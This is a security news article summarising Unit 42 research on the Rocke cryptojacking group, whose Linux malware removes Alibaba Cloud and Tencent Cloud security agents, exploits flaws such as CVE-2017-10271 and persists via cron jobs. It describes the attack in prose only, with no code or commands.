Analysis of new malware samples used by the Rocke group for cryptojacking reveals code that uninstalls from Linux servers multiple cloud security and monitoring products developed by Tencent Cloud and Alibaba Cloud.
Rocke’s goal is to compromise Linux machines and use them to mine for Monero cryptocurrency. They exploit several vulnerabilities in Apache Struts 2, Oracle WebLogic and Adobe ColdFusion.
Analyzing the new malware strains used by Rocke, researchers from Palo Alto Network’s Unit32 team found that it first gain full administrative control of the machine and then use this position to run a routine that uninstalls local agents that could sound the alarm about malicious activity.
The targets are local agents added by Tencent Host Security (HS, also known as YunJing) and the Threat Detection Service (TDS, also known as Aegis) from Alibaba Cloud.
The two products offer features such as malware detection and removal, vulnerability management, log analysis, big data-based threat analysis, asset management, and password cracking alert.
Rocke’s cryptojacking malware can get rid of the following products:
Alibaba Threat Detection Service agent.
Alibaba CloudMonitor agent (Monitor CPU & memory consumption, network connectivity).
Alibaba Cloud Assistant agent (Tool for automatically managing instances).
Tencent Host Security agent.
Tencent Cloud Monitor agent.
The threat actor is not new in the cybercriminal landscape. It was first reported to the public by Cisco Talos, in August 2018. However, researchers were familiar with Rocke’s activity prior to this date, from campaigns as early as April 2018.
The gang is tied to the Iron cybercrime group, believed to be the makers of the Linux cryptojacking it uses and of Xbash, a piece of malware that deletes databases on Linux and mines for cryptocurrency on Windows.
One of the vulnerabilities the group exploits is CVE-2017-10271. After compromising a machine, Rocke’s malware achieves persistence via cron jobs and kills other cryptomining processes present.
Palo Alto Networks Unit 42 has been cooperating with Tencent Cloud and Alibaba Cloud to address the malware evasion problem and its C2 infrastructure. Additionally, the malicious C2 domains are identified by our PAN-DB URL Filtering.
Public cloud infrastructure is one of the main targets for this cybercrime group. Realizing the existing cloud monitor and security products may detect the possible malware intrusion, malware authors continue to create new evasion technologies to avoid being detected by cloud security product.